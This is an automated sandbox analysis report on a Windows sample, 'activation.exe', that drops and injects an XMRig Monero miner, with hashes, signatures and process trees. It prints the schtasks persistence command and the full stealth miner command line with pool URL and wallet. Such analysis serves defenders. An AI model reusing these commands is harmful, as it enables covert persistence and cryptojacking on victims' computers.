Analysis
-
max time kernel
111s -
max time network
146s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
07-05-2021 12:57
Static task
static1
Behavioral task
behavioral1
Sample
activation.exe
Resource
win7v20210408
General
-
Target
activation.exe
-
Size
2.2MB
-
MD5
2a8053b9d54341d3034b16e41c42885f
-
SHA1
d7f4188ce05d608cbbe5960b01cc2429351ae607
-
SHA256
0fb3b99e498638894f8a39cb9235108012e6820afb9f96dee7de733f7095f4ef
-
SHA512
38de1d1901bfa0c0be33d7729700315f1506a562f19788de99460e428995de28668f45a2a6c93cd5ddd875f032de5ba4b9970006b0355a115ae63f888ac04827
Malware Config
Signatures
-
XMRig Miner Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/1988-90-0x0000000140000000-0x0000000140739000-memory.dmp xmrig behavioral1/memory/1988-91-0x00000001402D33E4-mapping.dmp xmrig behavioral1/memory/1988-93-0x0000000140000000-0x0000000140739000-memory.dmp xmrig -
Executes dropped EXE 3 IoCs
Processes:
sihost64.exesmssmanagment.exesihost64.exepid process 792 sihost64.exe 908 smssmanagment.exe 1104 sihost64.exe -
Loads dropped DLL 3 IoCs
Processes:
activation.exesmssmanagment.exepid process 1652 activation.exe 1652 activation.exe 908 smssmanagment.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
smssmanagment.exedescription pid process target process PID 908 set thread context of 1988 908 smssmanagment.exe explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
activation.exesmssmanagment.exepid process 1652 activation.exe 1652 activation.exe 908 smssmanagment.exe 908 smssmanagment.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
activation.exesmssmanagment.exeexplorer.exedescription pid process Token: SeDebugPrivilege 1652 activation.exe Token: SeDebugPrivilege 908 smssmanagment.exe Token: SeLockMemoryPrivilege 1988 explorer.exe Token: SeLockMemoryPrivilege 1988 explorer.exe -
Suspicious use of WriteProcessMemory 37 IoCs
Processes:
activation.execmd.exesmssmanagment.execmd.exedescription pid process target process PID 1652 wrote to memory of 1324 1652 activation.exe cmd.exe PID 1652 wrote to memory of 1324 1652 activation.exe cmd.exe PID 1652 wrote to memory of 1324 1652 activation.exe cmd.exe PID 1324 wrote to memory of 1984 1324 cmd.exe schtasks.exe PID 1324 wrote to memory of 1984 1324 cmd.exe schtasks.exe PID 1324 wrote to memory of 1984 1324 cmd.exe schtasks.exe PID 1652 wrote to memory of 792 1652 activation.exe sihost64.exe PID 1652 wrote to memory of 792 1652 activation.exe sihost64.exe PID 1652 wrote to memory of 792 1652 activation.exe sihost64.exe PID 1652 wrote to memory of 908 1652 activation.exe smssmanagment.exe PID 1652 wrote to memory of 908 1652 activation.exe smssmanagment.exe PID 1652 wrote to memory of 908 1652 activation.exe smssmanagment.exe PID 908 wrote to memory of 1648 908 smssmanagment.exe cmd.exe PID 908 wrote to memory of 1648 908 smssmanagment.exe cmd.exe PID 908 wrote to memory of 1648 908 smssmanagment.exe cmd.exe PID 1648 wrote to memory of 824 1648 cmd.exe schtasks.exe PID 1648 wrote to memory of 824 1648 cmd.exe schtasks.exe PID 1648 wrote to memory of 824 1648 cmd.exe schtasks.exe PID 908 wrote to memory of 1104 908 smssmanagment.exe sihost64.exe PID 908 wrote to memory of 1104 908 smssmanagment.exe sihost64.exe PID 908 wrote to memory of 1104 908 smssmanagment.exe sihost64.exe PID 908 wrote to memory of 1988 908 smssmanagment.exe explorer.exe PID 908 wrote to memory of 1988 908 smssmanagment.exe explorer.exe PID 908 wrote to memory of 1988 908 smssmanagment.exe explorer.exe PID 908 wrote to memory of 1988 908 smssmanagment.exe explorer.exe PID 908 wrote to memory of 1988 908 smssmanagment.exe explorer.exe PID 908 wrote to memory of 1988 908 smssmanagment.exe explorer.exe PID 908 wrote to memory of 1988 908 smssmanagment.exe explorer.exe PID 908 wrote to memory of 1988 908 smssmanagment.exe explorer.exe PID 908 wrote to memory of 1988 908 smssmanagment.exe explorer.exe PID 908 wrote to memory of 1988 908 smssmanagment.exe explorer.exe PID 908 wrote to memory of 1988 908 smssmanagment.exe explorer.exe PID 908 wrote to memory of 1988 908 smssmanagment.exe explorer.exe PID 908 wrote to memory of 1988 908 smssmanagment.exe explorer.exe PID 908 wrote to memory of 1988 908 smssmanagment.exe explorer.exe PID 908 wrote to memory of 1988 908 smssmanagment.exe explorer.exe PID 908 wrote to memory of 1988 908 smssmanagment.exe explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\activation.exe"C:\Users\Admin\AppData\Local\Temp\activation.exe"1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "smssmanagment" /tr '"C:\Users\Admin\AppData\Roaming\smssmanagment.exe"' & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "smssmanagment" /tr '"C:\Users\Admin\AppData\Roaming\smssmanagment.exe"'3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\smssmanagment.exe"C:\Users\Admin\AppData\Roaming\smssmanagment.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "smssmanagment" /tr '"C:\Users\Admin\AppData\Roaming\smssmanagment.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "smssmanagment" /tr '"C:\Users\Admin\AppData\Roaming\smssmanagment.exe"'4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"3⤵
- Executes dropped EXE
-
C:\Windows\explorer.exeC:\Windows\explorer.exe -B --coin=monero --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14433 --user=4AXqAB3xATp3qXvA883jjVbbvQtqtFoVPLy79LU8TjqiWkK71DnXYAkRsgExycBRqsJ4yBNxAFnqvNmz6KhCDv1Z622gFLs.w --pass= --cpu-max-threads-hint=50 --donate-level=0 --unam-idle-wait=3 --unam-idle-cpu=100 --tls --unam-stealth3⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sysMD5
0c0195c48b6b8582fa6f6373032118da
SHA1d25340ae8e92a6d29f599fef426a2bc1b5217299
SHA25611bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
SHA512ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
4a4526b3f3574d1573a35e64ba2c0918
SHA1f4a85fed2af0c91d4e346133b5e65b415b697d7a
SHA2565c6d2647d383b6fa627cfd5216df18b7b04c9af6ea70582d9fd414611a94be3d
SHA5121d81b25e1700f6547a660bcaaccf8a50320004561fd94d407667e98fbcb76baef2545f190c32324bc0e67e3cff59f250a6489d8f8adac83bc7ae6de22b1363ab
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
4a4526b3f3574d1573a35e64ba2c0918
SHA1f4a85fed2af0c91d4e346133b5e65b415b697d7a
SHA2565c6d2647d383b6fa627cfd5216df18b7b04c9af6ea70582d9fd414611a94be3d
SHA5121d81b25e1700f6547a660bcaaccf8a50320004561fd94d407667e98fbcb76baef2545f190c32324bc0e67e3cff59f250a6489d8f8adac83bc7ae6de22b1363ab
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
4a4526b3f3574d1573a35e64ba2c0918
SHA1f4a85fed2af0c91d4e346133b5e65b415b697d7a
SHA2565c6d2647d383b6fa627cfd5216df18b7b04c9af6ea70582d9fd414611a94be3d
SHA5121d81b25e1700f6547a660bcaaccf8a50320004561fd94d407667e98fbcb76baef2545f190c32324bc0e67e3cff59f250a6489d8f8adac83bc7ae6de22b1363ab
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
4a4526b3f3574d1573a35e64ba2c0918
SHA1f4a85fed2af0c91d4e346133b5e65b415b697d7a
SHA2565c6d2647d383b6fa627cfd5216df18b7b04c9af6ea70582d9fd414611a94be3d
SHA5121d81b25e1700f6547a660bcaaccf8a50320004561fd94d407667e98fbcb76baef2545f190c32324bc0e67e3cff59f250a6489d8f8adac83bc7ae6de22b1363ab
-
C:\Users\Admin\AppData\Roaming\smssmanagment.exeMD5
2a8053b9d54341d3034b16e41c42885f
SHA1d7f4188ce05d608cbbe5960b01cc2429351ae607
SHA2560fb3b99e498638894f8a39cb9235108012e6820afb9f96dee7de733f7095f4ef
SHA51238de1d1901bfa0c0be33d7729700315f1506a562f19788de99460e428995de28668f45a2a6c93cd5ddd875f032de5ba4b9970006b0355a115ae63f888ac04827
-
C:\Users\Admin\AppData\Roaming\smssmanagment.exeMD5
2a8053b9d54341d3034b16e41c42885f
SHA1d7f4188ce05d608cbbe5960b01cc2429351ae607
SHA2560fb3b99e498638894f8a39cb9235108012e6820afb9f96dee7de733f7095f4ef
SHA51238de1d1901bfa0c0be33d7729700315f1506a562f19788de99460e428995de28668f45a2a6c93cd5ddd875f032de5ba4b9970006b0355a115ae63f888ac04827
-
\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
4a4526b3f3574d1573a35e64ba2c0918
SHA1f4a85fed2af0c91d4e346133b5e65b415b697d7a
SHA2565c6d2647d383b6fa627cfd5216df18b7b04c9af6ea70582d9fd414611a94be3d
SHA5121d81b25e1700f6547a660bcaaccf8a50320004561fd94d407667e98fbcb76baef2545f190c32324bc0e67e3cff59f250a6489d8f8adac83bc7ae6de22b1363ab
-
\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
4a4526b3f3574d1573a35e64ba2c0918
SHA1f4a85fed2af0c91d4e346133b5e65b415b697d7a
SHA2565c6d2647d383b6fa627cfd5216df18b7b04c9af6ea70582d9fd414611a94be3d
SHA5121d81b25e1700f6547a660bcaaccf8a50320004561fd94d407667e98fbcb76baef2545f190c32324bc0e67e3cff59f250a6489d8f8adac83bc7ae6de22b1363ab
-
\Users\Admin\AppData\Roaming\smssmanagment.exeMD5
2a8053b9d54341d3034b16e41c42885f
SHA1d7f4188ce05d608cbbe5960b01cc2429351ae607
SHA2560fb3b99e498638894f8a39cb9235108012e6820afb9f96dee7de733f7095f4ef
SHA51238de1d1901bfa0c0be33d7729700315f1506a562f19788de99460e428995de28668f45a2a6c93cd5ddd875f032de5ba4b9970006b0355a115ae63f888ac04827
-
memory/792-79-0x00000000008C0000-0x00000000008C2000-memory.dmpFilesize
8KB
-
memory/792-71-0x0000000000940000-0x0000000000941000-memory.dmpFilesize
4KB
-
memory/792-66-0x0000000000000000-mapping.dmp
-
memory/824-78-0x0000000000000000-mapping.dmp
-
memory/908-75-0x000000013F6E0000-0x000000013F6E1000-memory.dmpFilesize
4KB
-
memory/908-89-0x00000000022F0000-0x00000000022FA000-memory.dmpFilesize
40KB
-
memory/908-80-0x00000000026F0000-0x00000000026F2000-memory.dmpFilesize
8KB
-
memory/908-70-0x0000000000000000-mapping.dmp
-
memory/1104-88-0x0000000002640000-0x0000000002642000-memory.dmpFilesize
8KB
-
memory/1104-82-0x0000000000000000-mapping.dmp
-
memory/1104-86-0x00000000001B0000-0x00000000001B1000-memory.dmpFilesize
4KB
-
memory/1324-62-0x0000000000000000-mapping.dmp
-
memory/1648-77-0x0000000000000000-mapping.dmp
-
memory/1652-64-0x000000001C4C0000-0x000000001C4C2000-memory.dmpFilesize
8KB
-
memory/1652-60-0x000000013F090000-0x000000013F091000-memory.dmpFilesize
4KB
-
memory/1984-63-0x0000000000000000-mapping.dmp
-
memory/1988-90-0x0000000140000000-0x0000000140739000-memory.dmpFilesize
7.2MB
-
memory/1988-91-0x00000001402D33E4-mapping.dmp
-
memory/1988-92-0x0000000000170000-0x0000000000184000-memory.dmpFilesize
80KB
-
memory/1988-93-0x0000000140000000-0x0000000140739000-memory.dmpFilesize
7.2MB
-
memory/1988-94-0x00000000004D0000-0x00000000004F0000-memory.dmpFilesize
128KB
-
memory/1988-96-0x0000000000590000-0x00000000005B0000-memory.dmpFilesize
128KB
-
memory/1988-95-0x00000000004D0000-0x00000000004F0000-memory.dmpFilesize
128KB